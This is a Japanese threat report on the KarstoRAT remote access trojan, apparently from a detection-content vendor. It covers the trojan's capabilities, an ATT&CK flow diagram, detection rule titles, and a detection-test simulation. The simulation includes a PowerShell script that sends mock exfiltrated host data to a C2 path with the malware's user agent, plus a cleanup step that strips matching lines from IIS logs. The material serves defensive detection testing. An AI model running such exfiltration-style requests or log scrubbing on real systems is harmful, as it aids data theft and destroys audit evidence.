フォローする 
概要
KarstoRATは最近発見されたリモートアクセス型トロイの木馬で、システム情報を収集し、音声やWebカメラのフィードをキャプチャし、スクリーンショットを撮影し、キーストロークを記録し、認証トークンを盗むことができます。このマルウェアは持続性を維持し、独自のカスタムユーザーエージェントを介したHTTPを通じてコマンドアンドコントロールサーバーと通信し、後続の活動のための追加のペイロードを取得することが可能です。また、画面の反転や強制的な音声再生を含む破壊的な機能も含んでいます。
調査
LevelBlue SpiderLabsはKarstoRATの実行フロー、コマンドアンドコントロールの通信、情報流出ルーティン、そして持続性のメソッドを検証しました。このレポートは、マルウェアを維持するために使用される2秒間の無限ループを強調しており、 STARTUP_ON and STARTUP_OFF 自動起動動作を制御するコマンドを記録しました。また、研究者はデスクトップの壁紙を変更し、指示された場合に自身を削除する能力も文書化しました。
緩和策
検出活動は、マルウェアの特有のHTTPユーザーエージェント、疑わしいスタートアップ関連のレジストリエントリ、および異常なループプロセスの挙動に焦点を合わせるべきです。エンドポイント防御は、レポートに記載されたファイルレススタイルの活動を監視し、偽のRobloxマーケットプレースを餌に配信された未知のバイナリをブロックすることも行う必要があります。
対応策
KarstoRATが特定された場合は、影響を受けたデバイスを隔離し、HTTPトラフィックやスタートアップアーティファクトを含む法医学的証拠を保存し、すべての持続性メカニズムを削除してください。組織は公開されている資格情報を回転させ、初期の侵害後にダウンロードされた可能性のある二次ペイロードを監視し続けるべきです。
"graph TB %% クラス定義 classDef action fill:#99ccff classDef persistence fill:#ffcc99 classDef credential fill:#ff9999 classDef collection fill:#ccffcc classDef discovery fill:#ccccff classDef impact fill:#ffb347 classDef defense fill:#d3d3d3 %% ノード定義 action_user_execution["<b>アクション</b> – <b>T1204.001 ユーザー実行: 悪意のあるリンク</b><br/>被害者が偽のRobloxマーケットプレースリンクをクリック(ソーシャルエンジニアリング)。"] class action_user_execution action persistence_boot_script["<b>持続性</b> – <b>T1037 起動またはログオン初期化スクリプト</b><br/>マルウェアはSTARTUP_ON/OFFに自身を登録し、起動またはログオン時に自動的に実行される。"] class persistence_boot_script persistence credential_keylogging["<b>資格情報アクセス</b> – <b>T1056.001 入力キャプチャ: キーロギング</b><br/>マルウェアがキーストロークを記録して資格情報や他の機密データをキャプチャします。"] class credential_keylogging credential collection_screen_capture["<b>収集</b> – <b>T1113 スクリーンキャプチャ</b><br/>マルウェアが被害者のデスクトップのスクリーンショットを定期的に撮影します。"] class collection_screen_capture collection collection_audio_capture["<b>収集</b> – <b>T1123 オーディオキャプチャ</b><br/>マルウェアがシステムマイクから音声を録音します。"] class collection_audio_capture collection collection_video_capture["<b>収集</b> – <b>T1125 ビデオキャプチャ</b><br/>マルウェアがWebカメラにアクセスし、被害者のビデオを録画します。"] class collection_video_capture collection discovery_process["<b>探索</b> – <b>T1057 プロセス探索</b><br/>マルウェアがセキュリティツールや有価なアプリケーションを特定するために実行中のプロセスを列挙します。"] class discovery_process discovery discovery_hardware["<b>探索</b> – <b>T1592.001 被害者ホスト情報収集: ハードウェア</b><br/>マルウェアがCPU、RAM、GPUなどのハードウェア詳細を収集します。"] class discovery_hardware discovery discovery_software["<b>探索</b> – <b>T1592.002 被害者ホスト情報収集: ソフトウェア</b><br/>マルウェアがインストール済みのソフトウェアのバージョンやパッチを収集します。"] class discovery_software discovery discovery_firmware["<b>探索</b> – <b>T1592.003 被害者ホスト情報収集: ファームウェア</b><br/>マルウェアがファームウェアとBIOS情報を抽出します。"] class discovery_firmware discovery discovery_config["<b>探索</b> – <b>T1592.004 被害者ホスト情報収集: クライアント設定</b><br/>マルウェアが言語、タイムゾーン、ネットワークパラメーターなどの設定を収集します。"] class discovery_config discovery impact_remote_desktop["<b>影響</b> – <b>T1219.002 リモートデスクトップソフトウェア</b><br/>マルウェアがリモートデスクトップ機能を使用してデスクトップの背景を変更、表示を反転、マウスボタンを交換します。"] class impact_remote_desktop impact defense_self_destruct["<b>防御回避</b> – <b>T1027.005 ツールからのインジケーター削除</b><br/>マルウェアが自己破壊し、証拠を消去するためにファイルを削除します。"] class defense_self_destruct defense %% 接続 action_user_execution –>|リード| persistence_boot_script persistence_boot_script –>|有効にする| credential_keylogging credential_keylogging –>|有効にする| collection_screen_capture collection_screen_capture –>|有効にする| collection_audio_capture collection_audio_capture –>|有効にする| collection_video_capture collection_video_capture –>|有効にする| discovery_process discovery_process –>|リード| discovery_hardware discovery_hardware –>|リード| discovery_software discovery_software –>|リード| discovery_firmware discovery_firmware –>|リード| discovery_config discovery_config –>|有効にする| impact_remote_desktop impact_remote_desktop –>|トリガー| defense_self_destruct "
攻撃フロー
検出
特権昇格(FodHelperにおけるUACバイパス)(via registry_event)
ビュー
可能性のある持続性ポイント [ASEPs – ソフトウェア/NTUSER Hive] (via registry_event)
ビュー
持続性のためのSchtasksまたはATの使用可能性 (via cmdline)
ビュー
遅延実行のためのPING使用の可能性 (via cmdline)
ビュー
自動起動位置での疑わしいバイナリ/スクリプト (via file_event)
ビュー
IPルックアップドメイン通信の試みの可能性 (via dns)
ビュー
ポートトンネリングサービスの可能性 (via dns)
ビュー
KarstoRAT C2通信の検出 [Windowsネットワーク接続]
ビュー
KarstoRATマルウェア活動の検出 [Windowsプロセス作成]
ビュー
シミュレーション実行
前提条件: テレメトリとベースラインのプリフライトチェックが合格していること。
理由: このセクションは、検出ルールをトリガーするよう設計された敵対技術(TTP)の正確な実行を詳述します。コマンドと説明は特定されたTTPを直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃の説明とコマンド:
攻撃者は、被害者ネットワークへの足がかりを得て、KarstoRATのためのコマンドアンドコントロールチャネルを確立しようとしています。正当なトラフィックに溶け込むために、マルウェアはハードコードされたユーザーエージェント文字列 “SecurityNotifier” を使用します。攻撃者は侵害されたホストで、C2サーバーにHTTP POSTを発行し、UAヘッダーを埋め込んでPowerShell ワンライナーを実行します。リクエストには、流出したデータを模した小さなJSONペイロードが含まれており、これはシグマルールをトリガーするのに十分です。 -
回帰テストスクリプト:
# KarstoRAT C2 シミュレーション – PowerShell $c2Url = "http:///karsto_c2" $payload = @{ host = $env:COMPUTERNAME data = "サンプル流出データ" } | ConvertTo-Json $headers = @{ "User-Agent" = "SecurityNotifier" "Content-Type" = "application/json" } try { Invoke-WebRequest -Uri $c2Url ` -Method POST ` -Headers $headers ` -Body $payload ` -UseBasicParsing Write-Host "C2リクエストが送信されました。" } catch { Write-Error "C2リクエストの送信に失敗しました: $_" } -
クリーンアップコマンド:
# IISログから生成されたリクエストを削除(管理者権限が必要) $logPath = "C:inetpublogsLogFilesW3SVC1" Get-ChildItem -Path $logPath -Filter "*.log" | ForEach-Object { (Get-Content $_.FullName) | Where-Object { $_ -notmatch "SecurityNotifier" } | Set-Content $_.FullName } Write-Host "ログが洗浄されました。"